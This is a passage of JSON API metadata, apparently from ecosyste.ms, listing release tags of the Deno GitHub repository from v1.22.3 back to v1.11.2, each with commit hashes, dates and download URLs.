06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":nu